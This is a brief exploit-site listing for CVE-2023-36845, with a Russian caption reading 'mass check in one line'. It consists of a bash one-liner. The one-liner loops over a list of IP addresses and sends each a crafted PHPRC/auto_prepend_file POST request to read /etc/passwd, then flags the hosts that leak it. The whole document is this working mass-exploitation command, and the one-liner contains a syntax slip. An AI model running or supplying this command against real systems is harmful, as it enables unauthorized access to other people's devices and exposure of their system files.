Exploit for CVE-2023-36845
Exploit Code
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SIMROTION13-CVE-2023-36845
# CVE-2023-36845
Массовая проверка одной строкой CVE-2023-36845
root@kitploit:~
cat ip.txt| while read host do;do curl -sk "http://$host/?PHPRC=/dev/fd/0" -X POST -d 'auto_prepend_file="/etc/passwd"'| grep -i 'root:' && echo $host "is VULNERABLE";done